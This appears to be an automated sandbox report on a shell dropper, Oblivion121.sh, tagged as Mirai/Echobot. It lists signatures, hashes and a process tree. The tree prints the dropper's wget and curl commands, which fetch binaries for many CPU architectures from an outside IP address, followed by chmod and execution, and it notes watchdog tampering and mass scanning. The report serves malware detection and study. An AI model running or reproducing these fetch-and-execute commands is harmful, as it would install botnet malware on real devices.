Analysis
-
max time kernel
78s -
max time network
152s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
29/03/2025, 15:48
Static task
static1
Behavioral task
behavioral1
Sample
Oblivion121.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
Oblivion121.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
Oblivion121.sh
Resource
debian9-mipsbe-20240418-en
General
-
Target
Oblivion121.sh
-
Size
1KB
-
MD5
506ea803fdb2d5a593683fe98fec6f1f
-
SHA1
f71d6ccbfd48bff6ba7c06a7250e137f5ab75066
-
SHA256
71451b64fc1acf7e50295e14859f7957966210efb8351a26882f96781aa7c4e1
-
SHA512
213cf82427a6b073293b65f0745fa5bc95e24c7f684aec2f97b7548d4d099c0a0251f691d4a514818da6ad5b6674c55549eaa960a7ac7e2d28ee391d9d626fc5
Malware Config
Signatures
-
Detected Echobot 2 IoCs
resource yara_rule behavioral3/files/fstream-1.dat family_echobot behavioral3/files/fstream-4.dat family_echobot -
Echobot family
-
Mirai family
-
Contacts a large (168005) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 740 chmod 752 chmod 787 chmod 844 chmod 868 chmod 927 chmod 885 chmod 899 chmod 913 chmod 941 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/cp 741 Oblivion121.sh /tmp/cp 753 Oblivion121.sh /tmp/cp 789 Oblivion121.sh /tmp/cp 845 Oblivion121.sh /tmp/cp 869 Oblivion121.sh /tmp/cp 886 Oblivion121.sh /tmp/cp 900 Oblivion121.sh /tmp/cp 914 Oblivion121.sh /tmp/cp 928 Oblivion121.sh /tmp/cp 942 Oblivion121.sh -
Modifies Watchdog functionality 1 TTPs 18 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/misc/watchdog cp File opened for modification /dev/misc/watchdog cp File opened for modification /dev/misc/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/misc/watchdog cp File opened for modification /dev/misc/watchdog cp File opened for modification /dev/misc/watchdog cp File opened for modification /dev/misc/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/misc/watchdog cp -
Enumerates active TCP sockets 1 TTPs 9 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp -
Changes its process name 9 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself a44mjah1eipkc1ajj3n 753 cp Changes the process name, possibly in an attempt to hide itself amh5i1m 789 cp Changes the process name, possibly in an attempt to hide itself ih3gnddkb 845 cp Changes the process name, possibly in an attempt to hide itself jo4d2a1g3nkkdmpjj 869 cp Changes the process name, possibly in an attempt to hide itself a0bpkpimmofg33hhh1m 886 cp Changes the process name, possibly in an attempt to hide itself eo1i4ghi1bdjjn243nd 900 cp Changes the process name, possibly in an attempt to hide itself 01e5oa 914 cp Changes the process name, possibly in an attempt to hide itself 1p3id3noik0 928 cp Changes the process name, possibly in an attempt to hide itself fh2g25ffkfap1ebk 942 cp -
Reads system network configuration 1 TTPs 9 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp -
description ioc Process File opened for reading /proc/326/fd cp File opened for reading /proc/663/fd cp File opened for reading /proc/687/fd cp File opened for reading /proc/1/fd cp File opened for reading /proc/144/fd cp File opened for reading /proc/667/fd cp File opened for reading /proc/165/fd cp File opened for reading /proc/329/fd cp File opened for reading /proc/326/fd cp File opened for reading /proc/856/fd cp File opened for reading /proc/660/fd cp File opened for reading /proc/165/fd cp File opened for reading /proc/330/fd cp File opened for reading /proc/709/fd cp File opened for reading /proc/816/exe cp File opened for reading /proc/329/fd cp File opened for reading /proc/666/fd cp File opened for reading /proc/323/fd cp File opened for reading /proc/1/fd cp File opened for reading /proc/326/fd cp File opened for reading /proc/663/fd cp File opened for reading /proc/687/fd cp File opened for reading /proc/709/fd cp File opened for reading /proc/713/fd cp File opened for reading /proc/372/fd cp File opened for reading /proc/709/fd cp File opened for reading /proc/324/fd cp File opened for reading /proc/701/fd cp File opened for reading /proc/324/fd cp File opened for reading /proc/713/fd cp File opened for reading /proc/373/fd cp File opened for reading /proc/421/fd cp File opened for reading /proc/713/fd cp File opened for reading /proc/660/fd cp File opened for reading /proc/329/fd cp File opened for reading /proc/660/fd cp File opened for reading /proc/144/fd cp File opened for reading /proc/713/fd cp File opened for reading /proc/329/fd cp File opened for reading /proc/326/fd cp File opened for reading /proc/235/fd cp File opened for reading /proc/323/fd cp File opened for reading /proc/324/fd cp File opened for reading /proc/687/fd cp File opened for reading /proc/144/fd cp File opened for reading /proc/326/fd cp File opened for reading /proc/809/fd cp File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/323/fd cp File opened for reading /proc/713/fd cp File opened for reading /proc/372/fd cp File opened for reading /proc/663/fd cp File opened for reading /proc/373/fd cp File opened for reading /proc/929/exe cp File opened for reading /proc/663/fd cp File opened for reading /proc/667/fd cp File opened for reading /proc/915/exe cp File opened for reading /proc/329/fd cp File opened for reading /proc/666/fd cp File opened for reading /proc/667/fd cp File opened for reading /proc/235/fd cp File opened for reading /proc/421/fd cp File opened for reading /proc/887/exe cp File opened for reading /proc/901/fd cp -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 743 wget 744 curl 750 cat 753 cp -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/jade420.mpsl curl File opened for modification /tmp/jade420.arm6 wget File opened for modification /tmp/jade420.ppc wget File opened for modification /tmp/jade420.sh4 curl File opened for modification /tmp/jade420.x86 wget File opened for modification /tmp/jade420.mips wget File opened for modification /tmp/jade420.mpsl wget File opened for modification /tmp/jade420.arm4 curl File opened for modification /tmp/jade420.arm6 curl File opened for modification /tmp/jade420.arm7 wget File opened for modification /tmp/jade420.arm7 curl File opened for modification /tmp/jade420.ppc curl File opened for modification /tmp/jade420.x86 curl File opened for modification /tmp/jade420.mips curl File opened for modification /tmp/jade420.arm5 wget File opened for modification /tmp/jade420.arm5 curl File opened for modification /tmp/jade420.m68k wget File opened for modification /tmp/jade420.m68k curl File opened for modification /tmp/jade420.sh4 wget File opened for modification /tmp/cp Oblivion121.sh
Processes
-
/tmp/Oblivion121.sh/tmp/Oblivion121.sh1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:709 -
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.x862⤵
- Writes file to tmp directory
PID:712
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:738
-
-
/bin/catcat jade420.x862⤵PID:739
-
-
/bin/chmodchmod +x cp jade420.x86 Oblivion121.sh systemd-private-d5ea4fa2c7ed4bddb56f002a681611f0-systemd-timedated.service-lq89oW2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/cp./cp x862⤵PID:741
-
-
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:743
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:744
-
-
/bin/catcat jade420.mips2⤵
- System Network Configuration Discovery
PID:750
-
-
/bin/chmodchmod +x cp jade420.mips jade420.x86 Oblivion121.sh systemd-private-d5ea4fa2c7ed4bddb56f002a681611f0-systemd-timedated.service-lq89oW2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/cp./cp mips2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
- System Network Configuration Discovery
PID:753
-
-
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.mpsl2⤵
- Writes file to tmp directory
PID:762
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.mpsl2⤵
- Writes file to tmp directory
PID:772
-
-
/bin/chmodchmod +x cp jade420.mips jade420.mpsl jade420.x86 Oblivion121.sh systemd-private-d5ea4fa2c7ed4bddb56f002a681611f0-systemd-timedated.service-lq89oW2⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/cp./cp mpsl2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:789
-
-
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.arm42⤵PID:824
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.arm42⤵
- Writes file to tmp directory
PID:832
-
-
/bin/chmodchmod +x cp jade420.arm4 jade420.mips jade420.mpsl jade420.x86 Oblivion121.sh systemd-private-d5ea4fa2c7ed4bddb56f002a681611f0-systemd-timedated.service-lq89oW2⤵
- File and Directory Permissions Modification
PID:844
-
-
/tmp/cp./cp arm42⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:845
-
-
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.arm52⤵
- Writes file to tmp directory
PID:859
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.arm52⤵
- Writes file to tmp directory
PID:866
-
-
/bin/chmodchmod +x cp jade420.arm4 jade420.arm5 jade420.mips jade420.mpsl jade420.x86 Oblivion121.sh systemd-private-d5ea4fa2c7ed4bddb56f002a681611f0-systemd-timedated.service-lq89oW2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/cp./cp arm52⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:869
-
-
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.arm62⤵
- Writes file to tmp directory
PID:876
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.arm62⤵
- Writes file to tmp directory
PID:883
-
-
/bin/chmodchmod +x cp jade420.arm4 jade420.arm5 jade420.arm6 jade420.mips jade420.mpsl jade420.x86 Oblivion121.sh2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/cp./cp arm62⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:886
-
-
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.arm72⤵
- Writes file to tmp directory
PID:890
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.arm72⤵
- Writes file to tmp directory
PID:897
-
-
/bin/chmodchmod +x cp jade420.arm4 jade420.arm5 jade420.arm6 jade420.arm7 jade420.mips jade420.mpsl jade420.x86 Oblivion121.sh2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/cp./cp arm72⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:900
-
-
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.ppc2⤵
- Writes file to tmp directory
PID:904
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.ppc2⤵
- Writes file to tmp directory
PID:911
-
-
/bin/chmodchmod +x cp jade420.arm4 jade420.arm5 jade420.arm6 jade420.arm7 jade420.mips jade420.mpsl jade420.ppc jade420.x86 Oblivion121.sh2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/cp./cp ppc2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:914
-
-
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.m68k2⤵
- Writes file to tmp directory
PID:918
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.m68k2⤵
- Writes file to tmp directory
PID:925
-
-
/bin/chmodchmod +x cp jade420.arm4 jade420.arm5 jade420.arm6 jade420.arm7 jade420.m68k jade420.mips jade420.mpsl jade420.ppc jade420.x86 Oblivion121.sh2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/cp./cp m68k2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:928
-
-
/usr/bin/wgetwget http://176.65.144.18/bins/jade420.sh42⤵
- Writes file to tmp directory
PID:932
-
-
/usr/bin/curlcurl -O http://176.65.144.18/bins/jade420.sh42⤵
- Writes file to tmp directory
PID:939
-
-
/bin/chmodchmod +x cp jade420.arm4 jade420.arm5 jade420.arm6 jade420.arm7 jade420.m68k jade420.mips jade420.mpsl jade420.ppc jade420.sh4 jade420.x86 Oblivion121.sh2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/cp./cp sh42⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:942
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD53d2c880e79089241c8fbb272ee31060b
SHA123233e3043dc70c1e21e352f99bdcfc70a233dcd
SHA2567961cf5c0d14018d558bdb82ee0f4bb07967e1fd671444dd708ed782fdda54e4
SHA5121246ed2d4bdfe5f43f6f6ea13704d9a5c59c70d446b16be55103de187e2a97912e89ff1ff44553b900fba08e977309f2804af47a0afc6120555fe04afd5718e3
-
Filesize
68KB
MD5ca9c4fc72ea948856f5a37956f167bfc
SHA1a689a0fc903757672b777dda4f82a8688556d333
SHA25696f4ce7b2e797678dab4ccafd828ace3718b945bfe8a05357688a5cd2d166fc4
SHA512900e34ae8667a6cea737e5a16c3143d9ab8e20a3f466bc6b616bf47fc961809bfd3ffcdc938c0941c4209ac3ed4af2066d82942dd45e05f78199e87d9a87ddf2